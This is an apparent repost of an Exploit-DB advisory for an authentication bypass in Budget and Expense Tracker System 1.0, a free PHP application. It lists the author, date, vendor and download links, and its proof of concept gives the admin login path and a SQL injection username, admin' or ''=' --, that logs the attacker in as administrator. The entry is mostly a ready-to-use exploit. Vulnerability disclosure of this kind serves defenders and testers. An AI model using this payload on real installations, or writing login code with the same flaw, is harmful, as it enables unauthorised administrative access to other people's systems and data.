[webapps] Budget and Expense Tracker System 1.0 - Authenticated Bypass
2021-09-20 09:00:00 Author: www.exploit-db.com(查看原文) 阅读量:23 收藏
2021-09-20 09:00:00 Author: www.exploit-db.com(查看原文) 阅读量:23 收藏
# Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass
# Exploit Author: Prunier Charles-Yves
# Date: September 20, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
# Tested on: Linux, windows
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
Budget and Expense Tracker System 1.0, is prone to an Easy authentication bypass vulnerability on the application
allowing the attacker to login with admin acount
----- PoC: Authentication Bypass -----
Administration Panel: http://localhost/expense_budget/admin/login.php
Username: admin' or ''=' --
文章来源: https://www.exploit-db.com/exploits/50307
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh